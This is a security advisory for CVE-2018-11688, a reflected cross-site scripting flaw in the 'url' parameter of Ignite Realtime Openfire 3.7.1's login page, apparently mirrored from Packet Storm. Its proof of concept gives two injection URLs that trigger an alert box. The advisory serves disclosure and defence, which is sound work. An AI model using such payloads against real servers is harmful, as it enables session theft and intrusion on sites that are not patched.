Lucene search
Yavuz AtlasPACKETSTORM:148057HistoryJun 05, 2018 - 12:00 a.m.
Ignite Realtime Openfire 3.7.1 Cross Site Scripting
2018-06-0500:00:00
Yavuz Atlas
packetstormsecurity.com
28
EPSS
0.77
Percentile
98.3%
`I. VULNERABILITY
-------------------------
Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting
II. CVE REFERENCE
-------------------------
CVE-2018-11688
III. VENDOR HOMEPAGE
-------------------------
https://www.igniterealtime.org/projects/openfire/
IV. DESCRIPTION
-------------------------
url parameter at Openfire Version 3.7.1 has a reflected cross-site
scripting vulnerability. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
V. PROOF OF CONCEPT
-------------------------
http://domain.net:9090/login.jsp?url=a"onclick="alert(1)
http://domain.net:9090/login.jsp?url=a%22onclick=%22alert(1)
VI. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11688
VII. CREDIT
-------------------------
Yavuz Atlas - @yavuzatlas_
http://www.biznet.com.tr/biznet-guvenlik-duyurulari
`
Related
openvas
openvas
Openfire < 3.9.2 Reflected XSS Vulnerability - Active Check
2018-06-15 00:00:00
cvelist
cvelist
CVE-2018-11688
2018-06-13 16:00:00
nvd
nvd
CVE-2018-11688
2018-06-13 16:29:01
github
github
Ignite Realtime Openfire vulnerable to cross-site scripting
2022-05-14 00:57:52
prion
prion
Cross site scripting
2018-06-13 16:29:00
osv
osv
CVE-2018-11688
2018-06-13 16:29:01
Ignite Realtime Openfire vulnerable to cross-site scripting
2022-05-14 00:57:52
cve
cve
CVE-2018-11688
2018-06-13 16:29:01